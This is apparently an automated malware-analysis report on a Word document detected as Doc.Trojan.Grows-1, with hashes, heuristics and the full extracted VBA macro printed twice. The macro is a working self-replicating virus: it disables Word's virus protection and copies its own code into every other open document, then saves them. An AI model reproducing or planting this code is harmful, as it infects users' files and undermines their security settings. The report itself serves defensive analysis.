Office (OLE) malware analysis — malicious · f251168dae27b026

MALICIOUS

Office (OLE)

34.5 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 8d036869b52d7bf4a1ddbd3b8070abe9 SHA-1: b959aecc6a8b614c999423ca696f6ad8d9917ddc SHA-256: f251168dae27b02652bbdae23639b5dcce75414bc35fa1ebd2595d94dd865cf3

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document with a high-severity heuristic indicating the presence of VBA macros and a critical ClamAV detection for 'Doc.Trojan.Grows-1'. The Document_Open macro is present and attempts to write its own code to a file named 'Goat', then inject that code into other open documents and save them. This indicates a malicious macro downloader attempting to spread or execute further stages.

Heuristics 3

ClamAV: Doc.Trojan.Grows-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Grows-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1059 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1059 bytes
SHA-256: `06f79278a9db33119c0190db38eed88b078a3d16b5e561596b5f9cd6b07fb992`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Options.VirusProtection = (((2 * 2) - 4) * 1000) Options.ConfirmConversions = (((2 * 2) - 4) * 1000) If Documents.Count > 1 Then Open "Goat" For Output As #1 Print #1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule. _ Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) Close #1 For X = 1 To Documents.Count Set Blah = Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule Set Haha = Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule Blah.DeleteLines 1, Blah.CountOfLines Haha.AddFromFile "Goat" Documents.Item(X).SaveAs FileName:=Documents.Item(X).FullName Next X Kill "Goat" If (Hour(Now)) = 18 Then MsgBox "Mrrr", vbOKOnly, "Goat" End If End Sub 'Lys Was Here 'Goat... Grows Attribute VB_Name = "NewMacros"

SHA-256: 06f79278a9db33119c0190db38eed88b078a3d16b5e561596b5f9cd6b07fb992

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Options.VirusProtection = (((2 * 2) - 4) * 1000)
Options.ConfirmConversions = (((2 * 2) - 4) * 1000)
If Documents.Count > 1 Then
Open "Goat" For Output As #1
Print #1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule. _
Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Close #1
For X = 1 To Documents.Count
Set Blah = Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule
Set Haha = Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule
Blah.DeleteLines 1, Blah.CountOfLines
Haha.AddFromFile "Goat"
Documents.Item(X).SaveAs FileName:=Documents.Item(X).FullName
Next X
Kill "Goat"
If (Hour(Now)) = 18 Then MsgBox "Mrrr", vbOKOnly, "Goat"
End If
End Sub
'Lys Was Here
'Goat... Grows

Attribute VB_Name = "NewMacros"

Open this report in the interactive analyzer, or submit your own file for analysis.